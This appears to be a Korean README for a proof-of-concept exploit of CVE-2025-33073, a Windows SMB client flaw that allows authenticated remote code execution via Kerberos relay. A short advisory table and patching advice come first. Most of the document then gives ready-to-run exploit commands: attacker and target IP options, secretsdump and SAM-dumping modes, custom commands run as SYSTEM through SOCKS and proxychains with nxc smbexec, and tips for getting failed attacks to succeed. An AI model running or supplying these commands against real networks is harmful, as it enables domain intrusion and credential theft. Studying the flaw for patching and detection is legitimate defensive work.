
CVE-2025-33073
🔥 높은 심각도의 인증된 원격 코드 실행 🔥 Windows SMB 클라이언트의 부적절한 접근 제어 (CWE-284)
| 항목 | 세부 내용 |
|---|
| CVSS v3.1 점수 | 8.8 (높음) 🔥 |
| 영향을 받는 시스템 | Windows 10, 11, Server 2012–2025 (모든 에디션) 💻 |
| 공개일 | 2025년 6월 10일 📅 (2025년 6월 화요일 패치에서 패치됨) |
| 악용 여부 | 야생에서 적극적으로 악용됨 😱 2025년 10월 21일 CISA KEV에 추가됨 |
| 공격 벡터 | 네트워크 (인증됨) 🌐 |
| 영향 | SYSTEM 수준 코드 실행 👑 Kerberos 릴레이를 통한 측면 이동 |
| 우회 | NTLM 반사 완화 조치를 우회 ⚡ |
지금 패치하세요! 🔧
→ Microsoft 업데이트 적용 (예: KB5060998)
→ Microsoft 업데이트 가이드 🔗
SMB 서명 활성화 ✍️
→ 모든 클라이언트 및 서버에 적용
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
NTLM 제한 🚫
→ 가능한 경우 NTLM 차단
→ EDR 도구로 릴레이 시도 모니터링
자동화된 해결 방안? 🤖
→ Vicarius vRx 또는 사용자 정의 스크립트를 사용하여 대규모 수정
2025년 11월 15일 기준 상태:
✅ 패치됨
❌ 패치되지 않은 시스템에서는 여전히 악용 중
🔔 CISA 마감일: 2025년 11월 10일 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

사용자 정의 명령어 secretsdump 대신 사용자 정의 명령어를 실행할 수 있습니다.
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS SYSTEM 권한으로 유효한 연결이 설정된 후 명령어를 더 은밀하게 실행하기 위한 방법입니다. --target과 --target-ip는 여기서 동일해야 합니다.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

또한 SAM을 덤프하는 대신 proxychains를 통해 사용자 정의 명령어를 실행할 수 있습니다.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

장치와 동일한 브로드캐스트 도메인에 있고 LLMNR 포이즈닝에 취약한 경우, DNS 레코드를 등록하지 않고도 장치를 익스플로잇할 수 있습니다.

공격이 때때로 작동하지 않는 경우가 있는데, 이는 공격에 호스트 이름을 사용하여 Kali에서 DNS 조회가 발생하기 때문입니다. Kali가 DNS 서버를 사용하지 않거나 impacket-ntlmrelayx에서 '/ FAILED' 메시지가 표시되면 호스트를 /etc/hosts 파일에 추가해 보십시오. 그러면 공격이 작동할 것입니다.
IP를 사용하면 공격이 작동해야 합니다. 때로는 여러 번 실행하면 실패 대신 SUCCESS가 발생합니다. 왜 이런 일이 발생하는지는 현재까지 완전히 명확하지 않습니다. 네트워킹과 관련이 있다고 생각됩니다.
-M 또는 --method를 사용하여 다른 강제 방법을 시도해 보십시오.
로컬 NTLM 인증이 발생하는 경우

로컬 NTLM 인증이 발생하지 않아 FAILED 시도가 발생하는 경우

기다리지 말고 오늘 패치하세요! 🛑
네트워크의 보안이 그것에 달려 있습니다. 💪